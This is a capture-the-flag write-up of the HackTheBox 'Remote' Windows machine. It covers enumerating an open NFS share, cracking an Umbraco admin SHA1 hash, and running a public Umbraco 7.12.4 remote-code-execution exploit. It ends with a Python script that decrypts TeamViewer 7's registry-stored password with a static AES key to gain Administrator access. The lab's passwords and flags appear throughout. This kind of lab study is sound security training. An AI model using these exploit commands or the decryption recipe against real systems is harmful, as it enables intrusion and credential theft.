HackTheBox - Remote
Summary
| Remote | |
|---|---|
| Difficulty: | Easy |
| OS: | Windows |
| Release date: | 21-03-2020 |
| Remote was an easy Windows machine that required mounting an NFS drive, after which cracking a hashed password granted access to the Umbraco admin panel. Exploitation of a CVE in the installed Umbraco version provided foothold. I achieved root access by identifying a vulnerable version of TeamViewer and extracting credentials from the configuration. | |
Foothold
An Nmap scan revealed a number of open ports. Some interesting ones are 21 (FTP), 80 (HTTP), and 2049 (NFS).
mick@kali:~/Documents/HackTheBox/Remote$ nmap -sV -sC -oN nmap_remote 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 13:52 CEST
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.89% done; ETC: 13:53 (0:00:00 remaining)
Nmap scan report for 10.10.10.180
Host is up (0.027s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3m55s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-28T11:57:29
|_ start_date: N/A
The ‘/Contact’ page on the website contained an interesting link that says ‘Go to back office and install forms’.
Unfortunately logging in with default/trivial credentials failed. The Nmap scan from earlier also found port 2049 to be open, which is used for NFS. I checked which folders were accessible and mountable with the showmount command.
mick@kali:~/Documents/HackTheBox/Remote$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
The folder site_backups was available to everyone so I mounted it.
mick@kali:~/Documents/HackTheBox/Remote$ mkdir /tmp/site_backups
mick@kali:~/Documents/HackTheBox/Remote$ sudo mount -t nfs 10.10.10.180:/site_backups /tmp/site_backups
Listing the mounted folder shows several interesting files.
mick@kali:/tmp/site_backups$ ls -la
total 123
drwx------ 2 nobody 4294967294 4096 Feb 23 19:35 .
drwxrwxrwt 18 root root 4096 May 28 14:50 ..
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 18:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 18:16 bin
drwx------ 2 nobody 4294967294 8192 Feb 20 18:16 Config
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Media
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 18:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 06:57 Web.config
Inside the folder App_Data I found a file called “Umbraco.sdf”.
mick@kali:/tmp/site_backups/App_Data$ ls
total 1977
drwx------ 2 nobody 4294967294 4096 Feb 20 18:17 .
drwx------ 2 nobody 4294967294 4096 Feb 23 19:35 ..
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 cache
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Logs
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 Models
drwx------ 2 nobody 4294967294 64 Feb 20 18:16 packages
drwx------ 2 nobody 4294967294 4096 Feb 20 18:16 TEMP
-rwx------ 1 nobody 4294967294 36832 Feb 20 07:59 umbraco.config
-rwx------ 1 nobody 4294967294 1965978 Feb 20 07:05 Umbraco.sdf
SDF stands for Standard Database Format and is used to transfer data between databases applications. Running the strings command on this file revealed several usernames and password hashes. The most interesting result was what seems like a SHA1 hash for the admin.
mick@kali:~/Documents/HackTheBox/Remote$ strings Umbraco.sdf
...
[email protected]{"hashAlgorithm":"SHA1"}
...
This password was easily cracked with john.
mick@kali:~/Documents/HackTheBox/Remote$ john -format:Raw-SHA1 -wordlist:/usr/share/wordlists/rockyou.txt admin_hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:01 DONE (2020-05-30 21:18) 0.6451g/s 6337Kp/s 6337Kc/s 6337KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
This password provided me with access to the Umbraco dashboard.
By clicking on the question mark on the bottom left I learned that this is version 7.12.4 of Umbraco.
After some research I found this RCE affecting Umbraco 7.12.4. I found multiple PoC’s but this one appeared to be the easiest to use. With this exploit I achieved foothold, and with that also user access.
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c whoami
iis apppool\defaultapppool
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command ls ../../../Users'
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 5/30/2020 2:25 PM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 5/30/2020 3:10 PM Public
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command ls ../../../Users/Public'
Directory: C:\Users\Public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 5/30/2020 2:37 PM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-a---- 5/30/2020 3:10 PM 73802 ejecutame.exe
-a---- 5/30/2020 2:33 PM 562841 PowerUp.ps1
-ar--- 5/30/2020 2:26 PM 34 user.txt
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command Get-Content ../../../Users/Public/user.txt'
2336f87a1c6b286797a46b46b4b9d470
Root access
After some additional enumeration I discovered a running Teamviewer 7 installation.
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "net start"
These Windows services are started:
...
Task Scheduler
TCP/IP NetBIOS Helper
TeamViewer 7
Themes
...
The command completed successfully.
According to this Metasploit module, Teamviewer stores the encrypted password in the registry. It is trivial to decrypt this password as it is encrypted with a static key. I started by extracting the encrypted password from the registry, using the corresponding registry key I found in the Metasploit module. The key is located in the property ‘SecurityPasswordAES’.
mick@kali:~/Documents/HackTheBox/Remote$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "reg query HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\TeamViewer\\\\Version7"
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
StartMenuGroup REG_SZ TeamViewer 7
InstallationDate REG_SZ 2020-02-20
InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
Always_Online REG_DWORD 0x1
Security_ActivateDirectIn REG_DWORD 0x0
Version REG_SZ 7.0.43148
ClientIC REG_DWORD 0x11f25831
PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
LastMACUsed REG_MULTI_SZ \0005056B91447
MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion REG_DWORD 0x1
ClientID REG_DWORD 0x6972e4aa
CUse REG_DWORD 0x1
LastUpdateCheck REG_DWORD 0x5e72893c
UsageEnvironmentBackup REG_DWORD 0x1
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
MultiPwdMgmtIDs REG_MULTI_SZ admin
MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
Security_PasswordStrength REG_DWORD 0x3
To decrypt this password I needed an encryption key first. After searching around, this blog post provided me with the encryption key 0602000000a400005253413100040000, the IV 0100010067244F436E6762F25EA8D704 , and the correct cipher mode CBC. I wrote up a Python script to decrypt the password and ultimately found out the Administrator password.
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
key = unhexlify("0602000000a400005253413100040000")
IV = unhexlify("0100010067244F436E6762F25EA8D704")
aes = AES.new(key, AES.MODE_CBC, IV)
decrypted = aes.decrypt(unhexlify("FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"))
print("Decrypted password: " + str(decrypted))
The decrypted password was ‘!R3m0te!’.
mick@kali:~/Documents/HackTheBox/Remote$ python decryption.py
Decrypted password: !R3m0te!
This password provided me with Administrator access.
mick@kali:~$ smbclient \\\\10.10.10.180\\C$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Wed Feb 19 21:04:06 2020
._nfs DHS 0 Mon Jun 1 18:23:02 2020
Config.Msi DHS 0 Thu Feb 27 13:23:44 2020
Documents and Settings DHS 0 Wed Feb 19 21:03:20 2020
ftp_transfer D 0 Thu Feb 20 07:13:36 2020
inetpub D 0 Wed Feb 19 21:11:33 2020
Microsoft D 0 Thu Feb 20 05:09:44 2020
pagefile.sys AHS 738197504 Mon Jun 1 17:22:04 2020
PerfLogs D 0 Sat Sep 15 09:19:00 2018
Program Files DR 0 Sun Feb 23 20:19:40 2020
Program Files (x86) D 0 Sun Feb 23 20:19:45 2020
ProgramData DH 0 Wed Feb 19 22:16:04 2020
Recovery DHS 0 Wed Feb 19 21:03:20 2020
site_backups D 0 Mon Jun 1 17:22:16 2020
System Volume Information DHS 0 Thu Feb 20 07:43:40 2020
Users DR 0 Wed Feb 19 21:12:25 2020
Windows D 0 Thu Feb 20 06:52:33 2020
7779839 blocks of size 4096. 4734785 blocks available
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> exit
mick@kali:~/Documents/HackTheBox/Remote$ cat root.txt
18d01028beff9ae21624b97337c0cf26